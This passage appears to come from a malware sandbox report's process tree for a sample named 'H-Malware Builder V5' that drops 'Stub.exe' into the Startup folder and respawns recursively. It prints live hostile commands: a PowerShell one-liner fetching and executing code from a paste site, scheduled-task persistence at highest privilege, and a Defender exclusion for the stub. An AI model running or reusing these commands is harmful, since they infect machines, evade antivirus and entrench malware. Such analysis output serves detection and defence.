        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        32⤵
        
        PID:2892
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        33⤵
        
        PID:1796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        34⤵
        
        PID:2204
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        33⤵
        
        PID:2124
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        33⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        32⤵
        
        PID:2208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2724
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        33⤵
        
        PID:1256
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        34⤵
        
        PID:2012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        35⤵
        
        PID:3004
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        34⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2460
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        34⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        33⤵
        
        PID:952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2276
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        34⤵
        
        PID:1936
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        35⤵
        
        PID:2444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        36⤵
        
        PID:2964
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        35⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1408
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        35⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        34⤵
        
        PID:1564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3004
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        35⤵
        
        PID:1072
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        36⤵
        
        PID:596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        37⤵
        
        PID:2020
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        36⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2376
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        36⤵
        
        PID:1508
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        35⤵
        
        PID:784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1420
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        36⤵
        
        PID:960
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        37⤵
        
        PID:2792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        38⤵
        
        PID:1644
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        37⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2752
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        37⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        36⤵
        
        PID:3048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1924
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        37⤵
        
        PID:1204
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        38⤵
        
        PID:1880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        39⤵
        
        PID:2056
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        38⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1496
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        38⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        37⤵
        
        PID:784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1924
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        38⤵
        
        PID:988
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        39⤵
        
        PID:2624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        40⤵
        
        PID:3024
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        39⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2236
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        39⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        38⤵
        
        PID:2256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1496
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        39⤵
        
        PID:1108
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        40⤵
        
        PID:1060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        41⤵
        
        PID:2540
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        40⤵
        
        PID:2712
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        40⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1252
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        39⤵
        
        PID:2184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1512
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        40⤵
        
        PID:1004
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        41⤵
        
        PID:1920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        42⤵
        
        PID:2976
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        41⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1700
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        41⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        40⤵
        
        PID:936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1520
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        41⤵
        
        PID:2272
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        42⤵
        
        PID:1968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        43⤵
        
        PID:1912
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        42⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1508
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        42⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        41⤵
        
        PID:1220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1708
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        42⤵
        
        PID:1512
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        43⤵
        
        PID:2212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        44⤵
        
        PID:2424
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        43⤵
        
        PID:1420
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        43⤵
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        42⤵
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1968
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        43⤵
        
        PID:2328
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        44⤵
        
        PID:780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        45⤵
        
        PID:2912
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        44⤵
        
        PID:2836
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        44⤵
        
        PID:1696
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        43⤵
        
        PID:2260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2556
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        44⤵
        
        PID:2176
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        45⤵
        
        PID:2216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        46⤵
        
        PID:2968
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        45⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:348
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        45⤵
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        44⤵
        
        PID:1656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1496
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        45⤵
        
        PID:556
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        46⤵
        
        PID:1916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        47⤵
        
        PID:1064
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        46⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2880
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        46⤵
        
        PID:584
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        45⤵
        
        PID:2680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1108
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        46⤵
        
        PID:1720
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        47⤵
        
        PID:2116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        48⤵
        
        PID:2196
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        47⤵
        
        PID:2080
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        47⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:536
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        46⤵
        
        PID:2696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1648
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        47⤵
        
        PID:1968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        48⤵
        
        PID:2388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        49⤵
        
        PID:588
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        48⤵
        
        PID:2320
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        48⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        47⤵
        
        PID:1896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:236
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        48⤵
        
        PID:3032
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        49⤵
        
        PID:2404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        50⤵
        
        PID:2804
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        49⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2132
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        49⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1764
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        48⤵
        
        PID:1880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2152
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        49⤵
        
        PID:3000
        
        C:\Windows\System32\cmd.exe
        
